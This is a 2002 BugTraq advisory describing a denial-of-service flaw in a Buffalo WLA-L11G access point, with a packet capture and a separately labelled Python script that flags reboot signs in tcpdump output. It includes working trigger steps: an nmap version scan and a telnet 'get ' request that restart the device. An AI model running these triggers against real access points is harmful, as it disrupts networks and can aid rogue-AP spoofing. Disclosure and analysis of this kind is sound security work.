BugTraq
Buffalo AP Denial of Service Nov 13 2002 07:39PM
Andrei Mikhailovsky (andrei arhont com) (1 replies)


Arhont Ltd. - Information Security

Arhont Advisory by: Andrei Mikhailovsky
(www.arhont.com)

Advisory: Buffalo AP
AP Model Name: WLA-L11G Ver.2.31
Wireless Firmware: WLI-PCM-L11G Ver.6.14
Model Specific: Other versions of Buffalo APs might be vulnerable
Manufacturer site: http://www.buffalotech.com
Manufacturer contact: info@buffalotech.com
Contact Date: 25/10/2002

DETAILS:

While performing network testing, we found a Buffalo Access Point (WLA-L11G Ver.2.31) vulnerable to a Denial of Service (DoS) attack. Simply using a network scanning tool such as nmap (www.insecure.org) with version detection in the following manner restarts the AP:

$ nmap -sVVV -p 80 192.168.177.250

where 192.168.177.250 is the IP address of the Buffalo AP.

Analysing the network traffic shows the following:

14:16:14.622714 192.168.177.7.34968 > 192.168.177.250.www: S [tcp sum ok] 4001152576:4001152576(0) win 5840 <mss 1460,sackOK,timestamp 5143788 0,nop,wscale 0> (DF) [tos 0x10] (ttl 64, id 49836, len 60)
0x0000 4510 003c c2ac 4000 4006 5bad c0a8 4d07    E..<..@.@.[...M.
0x0010 c0a8 4dfa 8898 0050 ee7c be40 0000 0000    ..M....P.|.@....
0x0020 a002 16d0 6204 0000 0204 05b4 0402 080a    ....b...........
0x0030 004e 7cec 0000 0000 0103 0300              .N|.........

14:16:14.623498 192.168.177.250.www > 192.168.177.7.34968: S [tcp sum ok] 51008176:51008176(0) ack 4001152577 win 16000 <mss 1460> (ttl 30, id 2, len 44)
0x0000 4500 002c 0002 0000 1e06 8078 c0a8 4dfa    E..,.......x..M.
0x0010 c0a8 4d07 0050 8898 030a 52b0 ee7c be41    ..M..P....R..|.A
0x0020 6012 3e80 b1e2 0000 0204 05b4 0000         `.>...........

14:16:14.623539 192.168.177.7.34968 > 192.168.177.250.www: . [tcp sum ok] 1:1(0) ack 1 win 5840 (DF) [tos 0x10] (ttl 64, id 49837, len 40)
0x0000 4510 0028 c2ad 4000 4006 5bc0 c0a8 4d07    E..(..@.@.[...M.
0x0010 c0a8 4dfa 8898 0050 ee7c be41 030a 52b1    ..M....P.|.A..R.
0x0020 5010 16d0 f14f 0000                        P....O..

14:16:15.402518 192.168.177.7.34968 > 192.168.177.250.www: P [tcp sum ok] 1:7(6) ack 1 win 5840 (DF) [tos 0x10] (ttl 64, id 49838, len 46)
0x0000 4510 002e c2ae 4000 4006 5bb9 c0a8 4d07    E.....@.@.[...M.
0x0010 c0a8 4dfa 8898 0050 ee7c be41 030a 52b1    ..M....P.|.A..R.
0x0020 5018 16d0 08b2 0000 6765 7420 0d0a         P.......get...

14:16:15.647578 192.168.177.250.www > 192.168.177.7.34968: . [tcp sum ok] 1:1(0) ack 7 win 16000 (ttl 30, id 3, len 40)
0x0000 4500 0028 0003 0000 1e06 807b c0a8 4dfa    E..(.......{..M.
0x0010 c0a8 4d07 0050 8898 030a 52b1 ee7c be47    ..M..P....R..|.G
0x0020 5010 3e80 c999 0000 0000 0000 0000         P.>...........

14:16:15.647639 192.168.177.7.34968 > 192.168.177.250.www: P [tcp sum ok] 7:9(2) ack 1 win 5840 (DF) [tos 0x10] (ttl 64, id 49839, len 42)
0x0000 4510 002a c2af 4000 4006 5bbc c0a8 4d07    E..*..@.@.[...M.
0x0010 c0a8 4dfa 8898 0050 ee7c be47 030a 52b1    ..M....P.|.G..R.
0x0020 5018 16d0 e435 0000 0d0a                   P....5....

14:16:16.358599 192.168.177.7.34968 > 192.168.177.250.www: P [tcp sum ok] 7:9(2) ack 1 win 5840 (DF) [tos 0x10] (ttl 64, id 49840, len 42)
0x0000 4510 002a c2b0 4000 4006 5bbb c0a8 4d07    E..*..@.@.[...M.
0x0010 c0a8 4dfa 8898 0050 ee7c be47 030a 52b1    ..M....P.|.G..R.
0x0020 5018 16d0 e435 0000 0d0a                   P....5....

14:16:17.750198 arp who-has 192.168.177.250 tell 192.168.177.250
0x0000 0001 0800 0604 0001 0007 4006 0656 c0a8    ..........@..V..
0x0010 4dfa 0000 0000 0000 c0a8 4dfa 0000 0000    M.........M.....
0x0020 0000 0000 0000 0000 0000 0000 0000         ..............

14:16:17.798596 192.168.177.7.34968 > 192.168.177.250.www: P [tcp sum ok] 7:9(2) ack 1 win 5840 (DF) [tos 0x10] (ttl 64, id 49841, len 42)
0x0000 4510 002a c2b1 4000 4006 5bba c0a8 4d07    E..*..@.@.[...M.
0x0010 c0a8 4dfa 8898 0050 ee7c be47 030a 52b1    ..M....P.|.G..R.
0x0020 5018 16d0 e435 0000 0d0a                   P....5....

14:16:20.274463 arp who-has 192.168.177.7 tell 192.168.177.250
0x0000 0001 0800 0604 0001 0007 4006 0656 c0a8    ..........@..V..
0x0010 4dfa 0000 0000 0000 c0a8 4d07 0000 0000    M.........M.....
0x0020 0000 0000 0000 0000 0000 0000 0000         ..............

14:16:20.274488 arp reply 192.168.177.7 is-at 0:4:5a:63:a4:be
0x0000 0001 0800 0604 0002 0004 5a63 a4be c0a8    ..........Zc....
0x0010 4d07 0007 4006 0656 c0a8 4dfa              M...@..V..M.

14:16:20.275495 192.168.177.250.www > 192.168.177.7.34968: FR [tcp sum ok] 51008177:51008177(0) win 0 (ttl 30, id 1, len 40)
0x0000 4500 0028 0001 0000 1e06 807d c0a8 4dfa    E..(.......}..M.
0x0010 c0a8 4d07 0050 8898 030a 52b1 0000 0000    ..M..P....R.....
0x0020 5005 0000 b4e9 0000 0000 0000 0000         P.............

The AP acknowledges the six-byte "get " request (ack 7) but never answers the retransmitted CRLF; about two seconds later it sends a gratuitous ARP for its own address, and when it finally responds it resets the stale connection with an IP ID of 1 (its earlier packets carried ids 2 and 3), both consistent with the device having rebooted.
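As an added example (not part of the advisory), the following Python script reads tcpdump summary lines in the format shown above and reports the two restart indicators visible in this trace: the AP's gratuitous ARP for its own address and its IP ID counter falling back to 1. The sample lines are constructed from the capture above with the hex dump lines removed, and the function name is my own.

```python
"""Flag host-restart evidence in tcpdump text output (added example, not from the advisory)."""
import re

# Constructed sample: the advisory's capture with the hex-dump lines dropped.
SAMPLE = """\
14:16:14.622714 192.168.177.7.34968 > 192.168.177.250.www: S [tcp sum ok] 4001152576:4001152576(0) win 5840 <mss 1460> (DF) [tos 0x10] (ttl 64, id 49836, len 60)
14:16:14.623498 192.168.177.250.www > 192.168.177.7.34968: S [tcp sum ok] 51008176:51008176(0) ack 4001152577 win 16000 <mss 1460> (ttl 30, id 2, len 44)
14:16:15.647578 192.168.177.250.www > 192.168.177.7.34968: . [tcp sum ok] 1:1(0) ack 7 win 16000 (ttl 30, id 3, len 40)
14:16:17.750198 arp who-has 192.168.177.250 tell 192.168.177.250
14:16:20.275495 192.168.177.250.www > 192.168.177.7.34968: FR [tcp sum ok] 51008177:51008177(0) win 0 (ttl 30, id 1, len 40)
"""

# "arp who-has <target> tell <sender>": target == sender is a gratuitous ARP,
# which a freshly booted stack sends to announce (and probe) its own address.
ARP_RE = re.compile(r"^(\S+) arp who-has (\S+) tell (\S+)$")
# IPv4 summary line: we need the timestamp, the source IP and the IP ID field.
IP_RE = re.compile(r"^(\S+) (\d+\.\d+\.\d+\.\d+)\.\S+ > .*\(ttl \d+, id (\d+), len \d+\)$")


def find_restart_indicators(text, wrap_margin=1000):
    """Return (timestamp, host, reason) tuples for every restart indicator seen."""
    last_id = {}
    hits = []
    for line in text.splitlines():
        m = ARP_RE.match(line)
        if m:
            ts, target, sender = m.groups()
            if target == sender:
                hits.append((ts, sender, "gratuitous ARP"))
            continue
        m = IP_RE.match(line)
        if not m:
            continue  # hex dump lines, ARP replies, anything else
        ts, src, ip_id = m.group(1), m.group(2), int(m.group(3))
        prev = last_id.get(src)
        # The AP numbers datagrams sequentially (ids 2, 3, ... then 1 after the
        # reboot).  A backwards jump that is not a 16-bit wrap-around means the
        # counter, and almost certainly the host, was reset.  Caveat: stacks that
        # randomise the IP ID field will trip this check for no reason.
        if prev is not None and ip_id < prev < 65536 - wrap_margin:
            hits.append((ts, src, f"IP ID counter reset ({prev} -> {ip_id})"))
        last_id[src] = ip_id
    return hits


if __name__ == "__main__":
    for ts, host, reason in find_restart_indicators(SAMPLE):
        print(f"{ts} {host}: {reason}")
```

Feed it `tcpdump -n -vv` text (without `-x`) from a capture of the AP's segment; hosts with randomised IP IDs need the ID check disabled.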

The attack can also be reproduced manually via telnet:

andrei@192.168.177.7:~$ telnet 192.168.177.250 80
Trying 192.168.177.250...
Connected to 192.168.177.250 (192.168.177.250).
Escape character is '^]'.
GET / HTTP/1.0
Connection closed by foreign host.

and

andrei@192.168.177.7:~$ telnet 192.168.177.250 80
Trying 192.168.177.250...
Connected to 192.168.177.250 (192.168.177.250).
Escape character is '^]'.
get
Connection closed by foreign host.

(note that there is a <space> after "get"; without the <space>, the AP does not restart)

Impact: An attacker can use this vulnerability to restart the AP. This might be useful if the attacker has changed the configuration files and a restart of the AP is required to apply the changes. It is also possible to use this attack to spoof an AP and make the clients connect to a rogue or spoofed AP instead of the legitimate one.

Risk Factor: Medium/High

According to Arhont Ltd. policy, all vulnerabilities and security issues found will be reported to the manufacturer 7 days before public release (e.g. to CERT and BUGTRAQ).

If you would like more information about this issue, please do not hesitate to contact the Arhont team.

Regards,

Andrei Mikhailovsky
Arhont Ltd.
http://www.arhont.com

GnuPG Keyserver: blackhole.pca.dfn.de
GnuPG Key: 0x178F548C
